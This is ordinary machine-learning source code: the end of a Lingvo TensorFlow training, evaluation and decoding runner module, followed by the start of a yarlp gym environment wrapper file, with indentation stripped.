for replica in xrange(device_assignment.num_replicas):
for core in xrange(device_assignment.num_cores_per_replica):
with tf.device(device_assignment.host_device(replica, core)):
outfeed_devices.append(
tf.contrib.tpu.outfeed_dequeue_tuple(
tensor_types,
tensor_shapes,
device_ordinal=device_assignment.tpu_ordinal(replica,
core)))
offset = i * num_devices
output_arrays = list(input_arrays)
# Each output_array holds a different per-example tensor. We get results
# for each tensor from each TPU for each TpuTrainStep call.
for j in range(len(output_arrays)):
for k in range(len(outfeed_devices)):
output_arrays[j] = output_arrays[j].write(offset + k,
outfeed_devices[k][j])
return tuple([i + 1] + output_arrays)
def LoopCond(i, *output_arrays):
del output_arrays
return i < num_loops
output_arrays = [
tf.TensorArray(
tensor_types[i],
size=num_loops * num_devices,
element_shape=tensor_shapes[i]) for i in range(len(tensor_shapes))
]
# Loop once for each time that TpuTrainStep runs.
output_arrays = tf.while_loop(
LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
concatenated_arrays = [array.concat() for array in output_arrays]
return dict(zip(sorted(per_example_tensors), concatenated_arrays))
def Start(self):
# Run training.
self._RunLoop('trainer', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
# Wait for _Loop to initialize variables first before attempting to infeed.
self._initialized.wait()
return super(TrainerTpu, self)._LoopEnqueue(op)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(self._container_id), self._GetSession() as sess:
sess.run(self.initialize_tables)
sess.run(self._initialize_local_vars)
sess.run(
tf.contrib.tpu.initialize_system(embedding_config=None, job=None))
if FLAGS.run_locally == 'tpu':
sess.run(tf.global_variables_initializer())
global_step, = sess.run([self._model.global_step])
self._initialized.set()
eval_metrics = None
while True:
if self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics):
# Early terminate gracefully by setting a new max step horizon: three
# more TPU steps to ensure that the enqueue ops can gracefully
# terminate as well.
if self._max_steps is None:
self._max_steps = global_step + 3 * self._steps_per_loop
tf.logging.info('Early stopping at step: %d', self._max_steps)
if self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
return
values, outfeeds = sess.run(self._tpu_train_ops)
eval_metrics = self._eval_metrics.PackMetricsValues(values)
# Note: global_step is incremented by self._steps_per_loop by the
# previous sess.run call.
global_step, = sess.run([self._model.global_step])
msg = 'step:%6d' % (global_step)
for key, (val, _) in sorted(six.iteritems(eval_metrics)):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val)
self._SetStatusMessage(msg)
task = self._model.GetTask()
if not task.per_example_tensors:
outfeeds = {}
task.ProcessFPropResults(sess, global_step, eval_metrics, outfeeds)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
outfeeds)
class Evaler(base_runner.BaseRunner):
"""Evaler."""
def __init__(self, eval_type, *args, **kwargs):
super(Evaler, self).__init__(*args, **kwargs)
self._job_name = 'evaler_' + eval_type
self._output_name = 'eval_' + eval_type
self.params.is_eval = True
self._eval_dir = os.path.join(self._logdir, self._output_name)
if self._model_task_name:
self._eval_dir += '_' + str(self._model_task_name)
tf.gfile.MakeDirs(self._eval_dir)
self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
self._should_report_metrics = self._job_name.startswith(
FLAGS.vizier_reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.cls(self.params)
self._params = self._model.params
# Always create the same graph to make sure node names are always
# exactly the same.
self._model.ConstructFPropGraph()
self._model_task = self._model.GetTask(self._model_task_name)
self._saver = self._GetSaver()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for eval models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.train.write_graph(self._graph.as_graph_def(), self._eval_dir,
'%s.pbtxt' % self._output_name)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
"""The main loop."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = None
while True:
path = self._FindNewCheckpoint(path, sess)
if not path or self._EvalOnce(path, sess):
break
self.EvalLatestCheckpoint(path)
if self._should_report_metrics:
self._trial.ReportDone()
tf.logging.info('Evaluation finished.')
def EvalLatestCheckpoint(self, last_path=None):
"""Runs eval once on the latest checkpoint."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already evaluated.')
return
self._EvalOnce(path, sess)
def _EvalOnce(self, path, sess):
"""Runs evaluation for a batch of samples.
Args:
path: checkpoint path.
sess: the tf Session.
Returns:
should_stop.
"""
if not FLAGS.evaler_in_same_address_as_controller:
self._LoadCheckpointForEval(sess, path)
global_step = sess.run(self._model.global_step)
metrics_dict = {
name: metrics.AverageMetric() for name in self._model_task.eval_metrics
}
num_samples_metric = metrics_dict['num_samples_in_batch']
while (num_samples_metric.total_value <
self._model_task.params.eval.samples_per_summary):
# NOTE: We intentionally do not let FProp generate summaries by default,
# because evaler calls FProp multiple times for each checkpoint. Multiple
# summaries at the same step is often confusing. Instead, models should
# update eval_metrics and generate aggregate summaries.
ans = sess.run(self._model_task.eval_metrics)
for name, (value, weight) in six.iteritems(ans):
metrics_dict[name].Update(value, weight)
tf.logging.info('Total examples done: %d/%d',
num_samples_metric.total_value,
self._model_task.params.eval.samples_per_summary)
# Replace average values with total values for certain metrics.
if 'num_predictions' in metrics_dict:
metrics_dict['num_predictions'].total_weight = 1.0
if 'num_words' in metrics_dict:
metrics_dict['num_words'].total_weight = 1.0
# When we have evaluated so many samples, generate a summary.
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._eval_dir),
global_step, {k: v.Summary(k) for k, v in six.iteritems(metrics_dict)},
text_filename=os.path.join(self._eval_dir,
'score-{:08d}.txt'.format(global_step)))
should_stop = global_step >= self.params.train.max_steps
if self._should_report_metrics:
trial_should_stop = self._trial.ReportEvalMeasure(global_step,
metrics_dict, path)
should_stop = should_stop or trial_should_stop
return should_stop
def GetDecoderDir(logdir, decoder_type, model_task_name):
if model_task_name:
decoder_dir = '%s_%s' % (decoder_type, model_task_name)
else:
decoder_dir = decoder_type
return os.path.join(logdir, decoder_dir)
def _GetCheckpointIdForDecodeOut(checkpoint_path, global_step):
"""Retrieve the checkpoint id for the decoder out file.
Finds the checkpoint id in the checkpoint file name and compares to global
step. If they diverge, uses the retrieved id and prints a warning.
Args:
checkpoint_path: path to checkpoint file.
global_step: int specifying the global step of the model.
Returns:
Checkpoint id as int.
"""
ckpt_id_from_file = int(re.sub(r'.*ckpt-', '', checkpoint_path))
tf.logging.info('Loaded checkpoint is at global step: %d', global_step)
tf.logging.info('Checkpoint path: %s', checkpoint_path)
tf.logging.info('Checkpoint id according to checkpoint path: %d',
ckpt_id_from_file)
if global_step != ckpt_id_from_file:
tf.logging.warning(
'Checkpoint id %d != global step %d. '
'Will use checkpoint id from checkpoint file for '
'writing decoder output.', ckpt_id_from_file, global_step)
return ckpt_id_from_file
class Decoder(base_runner.BaseRunner):
"""Decoder."""
def __init__(self, decoder_type, *args, **kwargs):
super(Decoder, self).__init__(*args, **kwargs)
self._job_name = 'decoder_' + decoder_type
self.params.is_eval = True
self._decoder_dir = GetDecoderDir(self._logdir, self._job_name,
self._model_task_name)
tf.gfile.MakeDirs(self._decoder_dir)
self._summary_writer = self._CreateSummaryWriter(self._decoder_dir)
self._should_report_metrics = self._job_name.startswith(
FLAGS.vizier_reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.cls(self.params)
self._params = self._model.params
self._model_task = self._model.GetTask(self._model_task_name)
# Note, different graphs are being constructed for different model
# tasks, which may result in different node names being chosen.
# Obviously, variable names has to be stay the same between train and
# decode.
input_batch = (
self._model_task.input_generator.GetPreprocessedInputBatch())
self._dec_output = self._model_task.Decode(input_batch)
self._saver = self._GetSaver()
self._summary_op = tf.summary.merge_all()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for decoder models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._decoder_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.train.write_graph(self._graph.as_graph_def(), self._decoder_dir,
'%s.pbtxt' % self._job_name)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
with tf.container(
self._container_id), self._GetSession(inline=False) as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = None
while True:
path = self._FindNewCheckpoint(path, sess)
if not path or self.DecodeCheckpoint(sess, path):
break
self.DecodeLatestCheckpoint(path)
if self._should_report_metrics:
self._trial.ReportDone()
tf.logging.info('Decoding finished.')
@classmethod
def GetDecodeOutPath(cls, decoder_dir, checkpoint_id):
"""Gets the path to decode out file."""
out_dir = cls._GetTtlDir(decoder_dir, duration='7d')
return os.path.join(out_dir, 'decoder_out_%09d' % checkpoint_id)
def DecodeCheckpoint(self, sess, checkpoint_path):
"""Decodes `samples_per_summary` examples using `checkpoint_path`."""
p = self._model_task.params
samples_per_summary = p.eval.decoder_samples_per_summary
if not samples_per_summary:
samples_per_summary = p.eval.samples_per_summary
self._LoadCheckpointForEval(sess, checkpoint_path)
global_step = sess.run(self._model.global_step)
dec_metrics = self._model_task.CreateDecoderMetrics()
buffered_decode_out = []
num_examples_metric = dec_metrics['num_samples_in_batch']
start_time = time.time()
while num_examples_metric.total_value < samples_per_summary:
tf.logging.info('Fetching dec_output.')
fetch_start = time.time()
run_options = config_pb2.RunOptions(
report_tensor_allocations_upon_oom=False)
if self._summary_op is None:
# No summaries were collected.
dec_out = sess.run(self._dec_output, options=run_options)
else:
dec_out, summary = sess.run([self._dec_output, self._summary_op],
options=run_options)
self._summary_writer.add_summary(summary, global_step)
post_process_start = time.time()
tf.logging.info(
'Done fetching (%f seconds)' % (post_process_start - fetch_start))
decode_out = self._model_task.PostProcessDecodeOut(dec_out, dec_metrics)
if decode_out:
buffered_decode_out.extend(decode_out)
tf.logging.info(
'Total examples done: %d/%d '
'(%f seconds decode postprocess)', num_examples_metric.total_value,
samples_per_summary,
time.time() - post_process_start)
summaries = {k: v.Summary(k) for k, v in six.iteritems(dec_metrics)}
elapsed_secs = time.time() - start_time
example_rate = num_examples_metric.total_value / elapsed_secs
summaries['examples/sec'] = metrics.CreateScalarSummary(
'examples/sec', example_rate)
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._decoder_dir),
global_step,
summaries,
text_filename=os.path.join(self._decoder_dir,
'score-{:08d}.txt'.format(global_step)))
self._ExportMetrics(
decode_checkpoint=global_step,
dec_metrics=dec_metrics,
example_rate=example_rate)
if buffered_decode_out:
# global_step and the checkpoint id from the checkpoint file might be
# different. For consistency of checkpoint filename and decoder_out
# file, use the checkpoint id as derived from the checkpoint filename.
checkpoint_id = _GetCheckpointIdForDecodeOut(checkpoint_path, global_step)
decode_out_path = self.GetDecodeOutPath(self._decoder_dir, checkpoint_id)
self._WriteKeyValuePairs(decode_out_path, buffered_decode_out)
should_stop = global_step >= self.params.train.max_steps
if self._should_report_metrics:
trial_should_stop = self._trial.ReportEvalMeasure(
global_step, dec_metrics, checkpoint_path)
should_stop = should_stop or trial_should_stop
return should_stop
def DecodeLatestCheckpoint(self, last_path=None):
"""Runs decoder on the latest checkpoint."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already decoded.')
return
self.DecodeCheckpoint(sess, path)
class RunnerManager(object):
"""Helper class for managing runners."""
# This is a hack so these classes can be overridded with internal
# non-public implementations.
inference_graph_exporter = inference_graph_exporter
model_registry = model_registry
Controller = Controller
Trainer = Trainer
TrainerTpu = TrainerTpu
Evaler = Evaler
Decoder = Decoder
def __init__(self, model):
self._model_name = model
def MaybeLaunchTensorFlow(self):
"""Starts TF machinary in this process."""
if FLAGS.run_locally:
return
tf.logging.info('Launching tensorflow.')
target = FLAGS.tf_master
if not target.startswith('localhost'):
# E.g., trainer_client is configured w/ FLAGS.tf_master pointing to
# another job. In that case, start a local server.
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = {}
for job_spec in job_specs:
# ps_host=worker1:1231,worker2:1234
job_machines = job_spec.split('=')
if len(job_machines) != 2:
raise ValueError('Invalid job specification: %s', job_spec)
cluster_spec_dict[job_machines[0]] = job_machines[1].split(',')
self._tf_server = tf.train.Server(
tf.train.ClusterSpec(cluster_spec_dict),
job_name=FLAGS.job,
task_index=FLAGS.task)
target = self._tf_server.target
if not FLAGS.tf_master:
FLAGS.tf_master = target
with tf.Session(target).as_default():
value = (tf.constant(1.) + tf.constant(1.)).eval()
assert value == 2.0, 'Something is really wrong.'
tf.logging.info('Launched tensorflow.')
def GetParamsForDataset(self, job_name, dataset_name):
"""Returns params for job `job_name` on the dataset `dataset_name`."""
try:
cfg = self.model_registry.GetParams(self._model_name, dataset_name)
except AttributeError as e:
dataset_name_retry = dataset_name.title()
tf.logging.warning('Exception configuring dataset %s, retrying as %s: %s',
dataset_name, dataset_name_retry, e)
cfg = self.model_registry.GetParams(self._model_name, dataset_name_retry)
tf.logging.warning('Succeeded after retrying as %s.' % dataset_name_retry)
self.UpdateClusterParamsFromFlags(cfg, job_name)
return cfg
def MaybeConfigRunDistributed(self):
"""If given a `FLAGS.cluster_spec`, update flags for running distributed."""
if not FLAGS.cluster_spec:
return
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = {}
for job_spec in job_specs:
# ps_host=worker1:1231,worker2:1234
job_machines = job_spec.split('=')
if len(job_machines) != 2:
raise ValueError('Invalid job specification: %s', job_spec)
cluster_spec_dict[job_machines[0]] = job_machines[1].split(',')
if FLAGS.job == 'trainer_client':
FLAGS.tf_master = 'grpc://%s' % cluster_spec_dict['worker'][FLAGS.task]
for job in cluster_spec_dict.keys():
if job.startswith('decoder_'):
assert len(job_specs) == 1, 'Decoder jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.decoder_job = '/job:%s' % job
FLAGS.decoder_replicas = 1
if job.startswith('evaler_'):
assert len(job_specs) == 1, 'Evaler jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.evaler_job = '/job:%s' % job
FLAGS.evaler_replicas = 1
if FLAGS.mode == 'sync' and FLAGS.job in ('controller', 'trainer_client',
'worker'):
FLAGS.worker_job = '/job:worker'
FLAGS.worker_replicas = len(cluster_spec_dict['worker'])
FLAGS.ps_job = '/job:worker'
FLAGS.ps_replicas = FLAGS.worker_replicas
if FLAGS.mode == 'async' and FLAGS.job in ('controller', 'trainer', 'ps'):
FLAGS.worker_job = '/job:trainer'
FLAGS.worker_replicas = len(cluster_spec_dict['trainer'])
FLAGS.ps_job = '/job:ps'
FLAGS.ps_replicas = len(cluster_spec_dict['ps'])
def UpdateClusterParamsFromFlags(self, cfg, job_name):
"""Update `cfg` with a training cluster configuration from flags."""
cfg.cluster.mode = FLAGS.mode
cfg.cluster.job = job_name
cfg.cluster.task = FLAGS.task
cfg.cluster.controller.name = FLAGS.controller_job
cfg.cluster.controller.gpus_per_replica = FLAGS.controller_gpus
cfg.cluster.worker.name = FLAGS.worker_job
cfg.cluster.worker.replicas = FLAGS.worker_replicas
cfg.cluster.worker.gpus_per_replica = FLAGS.worker_gpus
cfg.cluster.worker.tpus_per_replica = FLAGS.worker_tpus
cfg.cluster.worker.num_tpu_hosts = FLAGS.worker_num_tpu_hosts
cfg.cluster.worker.devices_per_split = FLAGS.worker_split_size
cfg.cluster.ps.name = FLAGS.ps_job
cfg.cluster.ps.replicas = FLAGS.ps_replicas
cfg.cluster.ps.gpus_per_replica = FLAGS.ps_gpus
cfg.cluster.input.name = FLAGS.input_job
cfg.cluster.input.replicas = FLAGS.input_replicas
cfg.cluster.evaler.name = FLAGS.evaler_job
cfg.cluster.evaler.replicas = FLAGS.evaler_replicas
cfg.cluster.evaler.gpus_per_replica = FLAGS.evaler_gpus
cfg.cluster.decoder.name = FLAGS.decoder_job
cfg.cluster.decoder.replicas = FLAGS.decoder_replicas
cfg.cluster.decoder.gpus_per_replica = FLAGS.decoder_gpus
def _CreateRunner(self, job, model_task_name, logdir, tf_master, trial):
"""Create a runner."""
evaler_job_name_prefix = 'evaler_'
decoder_job_name_prefix = 'decoder_'
tf.logging.info('Job %s start', job)
common_args = (model_task_name, logdir, tf_master, trial)
if job == 'controller':
cfg = self.GetParamsForDataset('controller', 'Train')
return self.Controller(cfg, *common_args)
elif job == 'trainer':
cfg = self.GetParamsForDataset('trainer', 'Train')
return self.Trainer(cfg, *common_args)
elif job == 'trainer_client':
cfg = self.GetParamsForDataset('trainer_client', 'Train')
if py_utils.use_tpu():
return self.TrainerTpu(cfg, *common_args)
else:
return self.Trainer(cfg, *common_args)
elif job.startswith(evaler_job_name_prefix):
dataset_name = job[len(evaler_job_name_prefix):]
cfg = self.GetParamsForDataset('evaler', dataset_name)
return self.Evaler(dataset_name.lower(), cfg, *common_args)
elif job.startswith(decoder_job_name_prefix):
dataset_name = job[len(decoder_job_name_prefix):]
cfg = self.GetParamsForDataset('decoder', dataset_name)
return self.Decoder(dataset_name.lower(), cfg, *common_args)
elif job in ('ps', 'worker', 'input'):
self._tf_server.join()
else:
raise ValueError('job %s is not supported' % job)
def CreateRunners(self, jobs, logdir, trial=base_trial.NoOpTrial()):
"""Creates a list of runners based on `FLAGS.mode`.
Args:
jobs: a list of runner jobs.
logdir: the directory used for logging, usually on CNS.
trial: optional `Trial` object, used for reporting measures and early
stopping.
Returns:
A list of `.BaseRunner`, one per job in `jobs`.
"""
runners = []
for j in jobs:
tf_master = FLAGS.tf_master
# Ensure that decoder or evaler threads do not clobber variables being
# updated by trainer by forcing them to use independent sessions.
if ('trainer' in jobs and
(j.startswith('decoder') or j.startswith('evaler'))):
tf_master = ''
runner = self._CreateRunner(j, FLAGS.model_task_name, logdir, tf_master,
trial)
runners.append(runner)
return runners
def StartRunners(self, runners):
"""Runs `runners` in parallel threads.
Returns when all of them finish.
Args:
runners: a list of `.BaseRunner`.
Returns:
None.
"""
threads = []
tf.logging.info('Starting runners')
for runner in runners:
t = threading.Thread(target=runner.Start)
t.daemon = True
t.start()
threads.append(t)
tf.logging.info('Total num runner.enqueue_ops: %d',
len(runner.enqueue_ops))
for enqueue_op in runner.enqueue_ops:
def StartEnqueue(runner, op):
tf.logging.info('Starting enqueue op %s', op.name)
return lambda: runner.StartEnqueueOp(op)
tq = threading.Thread(target=StartEnqueue(runner, enqueue_op))
tq.start()
threads.append(tq)
tf.logging.info('Waiting for runners to finish...')
for t in threads:
while True:
t.join(1)
if not t.isAlive():
break
tf.logging.info('All runners done.')
def RunTrial(self, job, logdir, trial):
"""A wrapper function for running a trial."""
if job == 'all':
# For async mode: Run controller, trainer, evaler jobs in one process,
# multiple threads.
self.StartRunners(
self.CreateRunners(['controller', 'trainer'], logdir, trial))
evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir,
FLAGS.tf_master, trial)
evaler.EvalLatestCheckpoint()
elif job == 'all_sync':
# For sync mode: Run controller, trainer_client, evaler jobs in one
# process, multiple threads.
self.StartRunners(
self.CreateRunners(['controller', 'trainer_client'], logdir, trial))
evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir,
FLAGS.tf_master, trial)
evaler.EvalLatestCheckpoint()
else:
# Run each job in separate process/task
# TODO(rpang): add support for running evaler_test and decoder.
self.StartRunners(self.CreateRunners([job], logdir, trial))
def MaybeConfigRunLocally(self):
"""Update flags if configured to run locally."""
if not FLAGS.run_locally:
# Do nothing
return
FLAGS.tf_master = tf.train.Server.create_local_server().target
if not FLAGS.mode:
FLAGS.mode = 'sync'
if not FLAGS.job:
if FLAGS.run_locally == 'tpu':
FLAGS.job = 'trainer_client'
else:
FLAGS.job = 'controller,trainer_client'
FLAGS.task = 0
FLAGS.controller_job = '/job:local'
FLAGS.worker_job = '/job:local'
FLAGS.worker_replicas = 1
if FLAGS.run_locally == 'gpu':
if not FLAGS.worker_gpus:
FLAGS.worker_gpus = 1
else:
FLAGS.worker_gpus = 0
if FLAGS.run_locally == 'tpu':
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
else:
FLAGS.worker_tpus = 0
if not FLAGS.worker_split_size:
FLAGS.worker_split_size = 1
FLAGS.ps_job = '/job:local'
FLAGS.ps_replicas = 1
FLAGS.ps_gpus = 0
FLAGS.input_job = '/job:local'
FLAGS.input_replicas = 0
FLAGS.evaler_job = '/job:local'
FLAGS.evaler_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.evaler_gpus = 1
else:
FLAGS.evaler_gpus = 0
FLAGS.decoder_job = '/job:local'
FLAGS.decoder_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.decoder_gpus = 1
else:
FLAGS.decoder_gpus = 0
def InspectModel(self):
"""Prints out model analysis for the model."""
p = self.GetParamsForDataset('controller', 'Train')
p.cluster.mode = 'sync'
c = cluster_factory.Cluster(p.cluster)
with tf.Graph().as_default(), c, tf.device(c.GetPlacer()):
analysis, _ = _ModelAnalysis(p.cls(p))
print(analysis)
def InspectDatasets(self):
"""Prints out datasets configured for the model."""
cls = self.model_registry.GetClass(self._model_name)
datasets = []
for name, _ in inspect.getmembers(cls, inspect.ismethod):
if name not in ['GetDatasetParams', 'Model', 'Task'
] and not name.startswith('_'):
datasets += [name]
print(','.join([_.lower() for _ in datasets]))
def InspectDecoder(self):
"""Prints out datasets configured for the decoder."""
cls = self.model_registry.GetClass(self._model_name)
has_decoder = False
if issubclass(cls, base_model_params.SingleTaskModelParams):
has_decoder = cls.Task(
).cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics
else:
for _, task_param in cls.Model().task_params.IterParams():
has_decoder |= (
task_param.cls.CreateDecoderMetrics !=
base_model.BaseTask.CreateDecoderMetrics)
if has_decoder:
# We assume that the proper decoder is implemented.
self.InspectDatasets()
else:
print('')
def WriteInferenceGraph(self):
"""Generates the inference graphs for a given model."""
inference_graph_dir = os.path.join(FLAGS.logdir, 'inference_graphs')
tf.gfile.MakeDirs(inference_graph_dir)
tf.logging.info('Writing inference graphs to dir: %s', inference_graph_dir)
cfg = self.model_registry.GetParams(self._model_name, 'Test')
if (issubclass(cfg.cls, base_model.MultiTaskModel) and
not FLAGS.model_task_name):
tf.logging.info('Cannot write inference graphs for multi-task model '
'when model_task_name is not specified.')
return
try:
filename_prefix = 'inference'
if FLAGS.model_task_name:
filename_prefix = '%s_inference' % FLAGS.model_task_name
filename_prefix = os.path.join(inference_graph_dir, filename_prefix)
# Standard inference graph.
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=FLAGS.model_task_name,
export_path=filename_prefix + '.pbtxt')
# TPU inference graph.
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=FLAGS.model_task_name,
device_options=self.inference_graph_exporter.InferenceDeviceOptions(
device='tpu',
retain_device_placement=False,
var_options='ON_DEVICE',
gen_init_op=True,
dtype_override=None),
export_path=filename_prefix + '_tpu.pbtxt')
except NotImplementedError as e:
tf.logging.error('Cannot write inference graph: %s', e)
def Start(self):
"""Start the process."""
tf.logging.set_verbosity(tf.logging.INFO)
assert self.model_registry.GetClass(
self._model_name), ('Model %s is not found.' % FLAGS.model)
if FLAGS.mode == 'inspect_model':
self.InspectModel()
return
if FLAGS.mode == 'inspect_evaler':
self.InspectDatasets()
return
if FLAGS.mode == 'inspect_decoder':
self.InspectDecoder()
return
if FLAGS.mode == 'write_inference_graph':
self.WriteInferenceGraph()
return
assert FLAGS.mode in ['sync', 'async']
if FLAGS.mode == 'shell':
_StartShell(locals())
return
self.MaybeConfigRunLocally()
self.MaybeConfigRunDistributed()
self.MaybeLaunchTensorFlow()
self.StartRunners(self.CreateRunners(FLAGS.job.split(','), FLAGS.logdir))
def main(unused_argv):
# pylint: disable=g-import-not-at-top
# pylint: disable=unused-variable
from lingvo import model_imports
RunnerManager(FLAGS.model).Start()
if __name__ == '__main__':
tf.app.run(main)
|
env_utils.py
|
import gym
import numpy as np
from gym.spaces import Discrete, Box
from gym.core import Env
from multiprocessing import Process, Pipe
from yarlp.utils.atari_wrappers import wrap_deepmind
from yarlp.utils.atari_wrappers import NoopResetEnv, MaxAndSkipEnv
def wrap_atari(env):
assert 'NoFrameskip' in env.spec.id,\
"{} is not an atari env".format(env)
env = MonitorEnv(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
env = wrap_deepmind(env, frame_stack=True, clip_rewards=True, scale=False)
return env
class MonitorEnv(gym.Wrapper):
def __init__(self, env=None):
"""
"""
super().__init__(env)
self._current_reward = None
self._num_steps = None
self._total_steps = None
self._episode_rewards = []
self._episode_lengths = []
self._num_episodes = 0
def reset(self, **kwargs):
obs = self.env.reset(**kwargs)
if self._total_steps is None:
self._total_steps = sum(self._episode_lengths)
if self._current_reward is not None:
self._episode_rewards.append(self._current_reward)
self._episode_lengths.append(self._num_steps)
self._num_episodes += 1
self._current_reward = 0
self._num_steps = 0
return obs
def step(self, action):
obs, rew, done, info = self.env.step(action)
self._current_reward += rew
self._num_steps += 1
self._total_steps += 1
return (obs, rew, done, info)
def get_episode_rewards(self):
return self._episode_rewards
def get_episode_lengths(self):
return self._episode_lengths
def get_total_steps(self):
return self._total_steps
class CappedCubicVideoSchedule(object):
def __call__(self, count):
if count < 1000:
return int(round(count ** (1. / 3))) ** 3 == count
else:
return count % 1000 == 0
class NoVideoSchedule(object):
def __call__(self, count):
return False
class GymEnv(Env):
"""
Taken from rllab gym_env.py
"""
def __init__(self, env_name, video=False,
log_dir=None,
force_reset=False,
is_atari=False,
*args, **kwargs):
self.env = env = gym.envs.make(env_name)
self._original_env = env
if is_atari:
self.env = wrap_atari(env)
# from yarlp.utils.wrap_atari import wrap_deepmind, wrap_deepmind2
# self.env = wrap_deepmind2(env_name)
else:
self.env = MonitorEnv(env)
assert isinstance(video, bool)
if log_dir is None:
self.monitoring = False
else:
if not video:
video_schedule = NoVideoSchedule()
else:
video_schedule = CappedCubicVideoSchedule()
self.env = gym.wrappers.Monitor(
self.env, log_dir, video_callable=video_schedule,
force=True)
self.monitoring = True
self.env_id = env.spec.id
self._log_dir = log_dir
self._force_reset = force_reset
@property
def action_space(self):
return self.env.action_space
@staticmethod
def env_action_space_is_discrete(env):
if isinstance(env.action_space, Discrete):
return True
elif isinstance(env.action_space, Box):
return False
else:
raise NotImplementedError('Uknown base environment: ', env)
@staticmethod
def get_env_action_space_dim(env):
if GymEnv.env_action_space_is_discrete(env):
return env.action_space.n
return env.action_space.shape[0]
@property
def observation_space(self):
return self.env.observation_space
def reset(self):
if self._force_reset and self.monitoring:
assert isinstance(self.env, gym.wrappers.Monitor)
recorder = self.env.stats_recorder
if recorder is not None:
recorder.done = True
return self.env.reset()
def step(self, action):
return self.env.step(action)
def render(self, *args, **kwargs):
self.env.render(*args, **kwargs)
def close(self):
self._original_env.close()
def seed(self, i=None):
return self.env.seed(i)
@property
def spec(self):
return self.env.spec
def __str__(self):
return "GymEnv: %s" % self.env
@property
def unwrapped(self):
return self.env.unwrapped
class NormalizedGymEnv(GymEnv):
"""
Taken from rllab normalized_env.py
"""
def __init__(self, env_name,
video=False,
log_dir=None,
force_reset=False,
scale_reward=1.,
min_reward_std=1e-2,
min_obs_std=1e-2,
norm_obs_clip=5,
normalize_obs=False,
normalize_rewards=False,
scale_continuous_actions=False,
is_atari=False,
*args, **kwargs):
super().__init__(env_name=env_name, video=video,
log_dir=log_dir, force_reset=force_reset,
is_atari=is_atari, *args, **kwargs)
self._scale_reward = scale_reward
self._normalize_obs = normalize_obs
self._normalize_rewards = normalize_rewards
self._scale_continuous_actions = scale_continuous_actions
self.is_atari = is_atari
if normalize_obs is True:
assert is_atari is False,\
"normalize_obs must be False if is_atari is True"
self._obs_rms = RunningMeanStd(
shape=(self.env.observation_space.shape),
min_std=min_obs_std, clip_val=norm_obs_clip)
if normalize_rewards is True:
self._reward_rms = RunningMeanStd(
shape=(1), min_std=min_reward_std)
@property
def action_space(self):
if isinstance(self.env.action_space, Box):
ub = np.ones(self.env.action_space.shape)
return Box(-1 * ub, ub)
return self.env.action_space
def _update_rewards(self, r, done):
self._reward_rms.cache(r)
r = self._reward_rms.normalize(r)
if done:
self._reward_rms.update()
return r
def _update_obs(self, obs, done):
self._obs_rms.cache(obs)
